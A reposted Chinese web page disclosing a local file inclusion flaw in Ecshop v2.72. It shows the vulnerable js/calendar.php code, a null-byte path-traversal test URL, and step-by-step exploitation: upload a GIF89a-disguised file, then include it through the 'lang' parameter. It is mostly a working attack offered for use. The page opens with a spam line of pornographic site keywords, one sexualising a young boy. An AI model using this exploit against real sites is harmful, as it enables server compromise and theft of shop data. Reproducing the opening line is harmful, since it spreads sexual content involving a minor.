小男孩‘自慰网亚洲一区二区,亚洲一级在线播放毛片,亚洲中文字幕av每天更新,黄aⅴ永久免费无码,91成人午夜在线精品,色网站免费在线观看,亚洲欧洲wwwww在线观看

分享

Ecshop最新版v.272本地包含漏洞Oday

 quasiceo 2014-05-04
Ecshop最新版v.272本地包含漏洞Oday
2011-01-12 13:33:44
標(biāo)簽:Ecshop v.272 Oday 休閑 職場

很久前就發(fā)現(xiàn)了,今天發(fā)布出來吧,雞肋的,其實很簡單,就是很多人沒有注意這里:

直接看代碼:

“js/calendar.php”:

$lang = (!empty($_GET['lang']))
trim($_GET['lang']) : 'zh_cn';//沒有過濾,很明顯的包含漏洞

if (!file_exists('../languages/' . $lang . '/calendar.php'))
{
$lang = 'zh_cn';
}

require(dirname(dirname(__FILE__)) . '/data/config.php');
header('Content-type: application/x-javascript; charset=' . EC_CHARSET);

include_once('../languages/' . $lang . '/calendar.php');//這里包含,需要截斷

 

測試代碼:

//需要 magic_quotes_gpc = Off

/js/calendar.php?lang=../index.php%00.

(注意后面有個“.”)

利用:

1、注冊用戶

2、然后上傳GIF89a頭的GIF文件欺騙,

3、然后包含,如:http://www./js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.

(注意后面有個“.”)?

    本站是提供個人知識管理的網(wǎng)絡(luò)存儲空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊一鍵舉報。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評論

    發(fā)表

    請遵守用戶 評論公約

    類似文章 更多